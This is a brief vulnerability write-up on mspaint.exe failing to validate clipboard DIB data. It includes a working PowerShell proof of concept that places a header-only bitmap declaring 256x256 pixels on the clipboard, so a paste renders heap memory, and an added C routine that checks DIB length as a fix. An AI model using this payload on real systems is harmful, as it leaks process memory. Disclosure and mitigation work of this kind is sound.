Summary

mspaint.exe does not properly verify DIB data pasted from the clipboard. We can therefore place crafted DIB data in the clipboard that, for example, declares a size of 0x100 by 0x100 pixels but contains nothing more than the DIB header itself. The actual image data rendered by mspaint.exe is then its own heap data =)

PoC

Run the following code in PowerShell:

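# Load the assembly that provides the Clipboard and DataFormats types
Add-Type -AssemblyName System.Windows.Forms
# BITMAPINFOHEADER only: biSize=40, biWidth=0x100, biHeight=0x100, biPlanes=1, biBitCount=24, biCompression=BI_RGB; no pixel data follows
$bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
[System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes))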

Afterwards, open mspaint.exe and paste. The result should be a graphical representation of some of mspaint.exe’s heap memory.
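
The length check whose absence the summary describes, as an added example (not part of the original write-up and not mspaint.exe's code): a consumer of clipboard DIB data compares the buffer length with the size the header implies before reading any pixels. The names dib_is_complete, poc_dib and small_dib, the restriction to BI_RGB and the 0x7FFF dimension cap are assumptions of this sketch.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static uint32_t rd32(const uint8_t *p) {           /* little-endian DWORD */
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* dib_is_complete (hypothetical name): 1 if the buffer holds every pixel its
 * BITMAPINFOHEADER promises, else 0. Accepts uncompressed (BI_RGB) data only. */
int dib_is_complete(const uint8_t *buf, size_t len) {
    if (len < 40) return 0;                         /* no complete header */
    uint32_t hdr = rd32(buf);                       /* biSize */
    if (hdr < 40 || hdr > len) return 0;
    int64_t w = (int32_t)rd32(buf + 4);             /* biWidth */
    int64_t h = (int32_t)rd32(buf + 8);             /* biHeight, negative = top-down */
    uint16_t bpp = rd16(buf + 14);                  /* biBitCount */
    if (rd16(buf + 12) != 1 || rd32(buf + 16) != 0) return 0;  /* biPlanes, BI_RGB */
    if (bpp != 1 && bpp != 4 && bpp != 8 && bpp != 16 && bpp != 24 && bpp != 32) return 0;
    if (h < 0) h = -h;
    /* Assumed sanity cap; it also keeps the 64-bit arithmetic below from wrapping. */
    if (w <= 0 || h == 0 || w > 0x7FFF || h > 0x7FFF) return 0;
    uint64_t colors = rd32(buf + 32);               /* biClrUsed */
    if (bpp <= 8) {
        if (colors == 0) colors = 1u << bpp;        /* 0 means a full palette */
        if (colors > (1u << bpp)) return 0;
    }
    uint64_t stride = (((uint64_t)w * bpp + 31) / 32) * 4;    /* rows are DWORD aligned */
    uint64_t need = hdr + colors * 4 + stride * (uint64_t)h;
    return need <= len;
}

/* The 40 header bytes from the PoC: 0x100 x 0x100, 24 bpp, no pixel data. */
static const uint8_t poc_dib[40] = {40,0,0,0, 0,1,0,0, 0,1,0,0, 1,0, 24,0, 0,0,0,0, 136,1};
/* Constructed sample: 2 x 2, 24 bpp, header plus 2 rows of 8 bytes (all zero). */
static const uint8_t small_dib[56] = {40,0,0,0, 2,0,0,0, 2,0,0,0, 1,0, 24,0};

int main(void) {
    printf("PoC header accepted:  %d\n", dib_is_complete(poc_dib, sizeof poc_dib));
    printf("2x2 sample accepted:  %d\n", dib_is_complete(small_dib, sizeof small_dib));
    return 0;
}
```

For the PoC header the check computes a requirement of 40 + 768 * 256 bytes against a 40-byte buffer, so the paste would be refused instead of rendering adjacent memory.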